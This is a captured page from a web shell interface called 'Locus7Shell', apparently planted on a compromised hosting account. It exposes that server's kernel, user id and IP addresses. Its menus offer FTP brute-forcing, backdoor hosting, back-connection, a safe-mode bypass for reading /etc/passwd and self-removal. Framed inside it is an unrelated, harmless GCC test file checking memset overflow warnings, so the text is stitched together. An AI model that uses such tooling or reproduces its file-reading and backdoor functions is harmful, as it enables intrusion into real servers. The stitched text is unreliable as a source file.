www.mycocharentes.fr - Locus7Shell


Software: Apache. PHP/5.4.45 uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 uid=243112(mycochar) gid=100(users) groups=100(users) Safe-mode: OFF (not secure) /home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/ drwxr-xr-x Free 0 B of 0 B (0%) Your ip: 216.73.216.77 - Server ip: 213.186.33.19 [Enumerate] [Encoder] [Tools] [Proc.] [FTP Brute] [Sec.] [SQL] [PHP-Code] [Backdoor Host] [Back-Connection] [milw0rm it!] [PHP-Proxy] [Self remove]


/* Verify that writes at excessive offsets into flexible array members
   of extern or allocated objects of unknow size are diagnosed.
   { dg-do compile }
   { dg-options "-O2" } */

#define DIFF_MAX __PTRDIFF_MAX__

typedef __PTRDIFF_TYPE__ ptrdiff_t;
typedef __SIZE_TYPE__    size_t;

void* memset (void*, int, size_t);

void sink (void*);

void char_flexarray_cst_off_cst_size (void)
{
  extern struct { char n, a[]; }
    caxcc;                              // { dg-message "at offset \[1-9\]\[0-9\]+ into destination object 'caxcc'" "note" }

  char *p = caxcc.a;
  size_t idx = DIFF_MAX - 4;

  memset (p + idx, 0, 3);
  sink (p);

  ++idx;
  memset (p + idx, 0, 3);               // { dg-warning "writing 3 bytes into a region of size 2" }
  sink (p);

  ++idx;
  memset (p + idx, 0, 3);               // { dg-warning "writing 3 bytes into a region of size 1" }

  ++idx;
  memset (p + idx, 0, 3);               // { dg-warning "writing 3 bytes into a region of size 0" }
}


void char_flexarray_var_off_cst_size (ptrdiff_t idx)
{
  extern struct { char n, a[]; }
    caxvc;                              // { dg-message "destination object 'caxvc'" "note" }

  char *p = caxvc.a;

  if (idx < DIFF_MAX - 4)
    idx = DIFF_MAX - 4;

  memset (p + idx, 0, 3);
  sink (p);

  memset (p + idx, 0, 5);               // { dg-warning "writing 5 bytes into a region of size 3" }
}


void char_flexarray_var_off_var_size (size_t n, ptrdiff_t idx)
{
  extern struct { char n, a[]; }
    caxvv;                              // { dg-message "destination object 'caxvv'" "note" }

  char *p = caxvv.a;

  if (idx < DIFF_MAX - 4)
    idx = DIFF_MAX - 4;

  if (n < 3 || 7 < n)
    n = 3;

  memset (p + idx, 0, n);
  sink (p);

  ++n;
  memset (p + idx, 0, n);               // { dg-warning "writing between 4 and 8 bytes into a region of size 3" }
}


void alloc_array_var_off_cst_size (size_t n, ptrdiff_t idx)
{
  struct { char n, a[]; }
    *p = __builtin_malloc (n);          // { dg-message "at offset \\d+ into destination object" "note" }

  if (idx < DIFF_MAX - 4)
    idx = DIFF_MAX - 4;

  memset (p->a + idx, 0, 3);
  sink (p);

  memset (p->a + idx, 0, 5);            // { dg-warning "writing 5 bytes into a region of size 3" }
}


void int_array_cst_off_cst_size (void)
{
  extern struct { int n, a[]; }
    iaxc;                               // { dg-message "at offset \[1-9\]\[0-9\]+ into destination object 'iaxc'" "note" }

  int *p = iaxc.a;
  size_t idx = DIFF_MAX / sizeof *p - 1;

  memset (p + idx, 0, 3);
  sink (p);

  memset (p + idx, 0, 5);               // { dg-warning "writing 5 bytes into a region of size 3" }
}


Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:


Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/


Enter:	Select: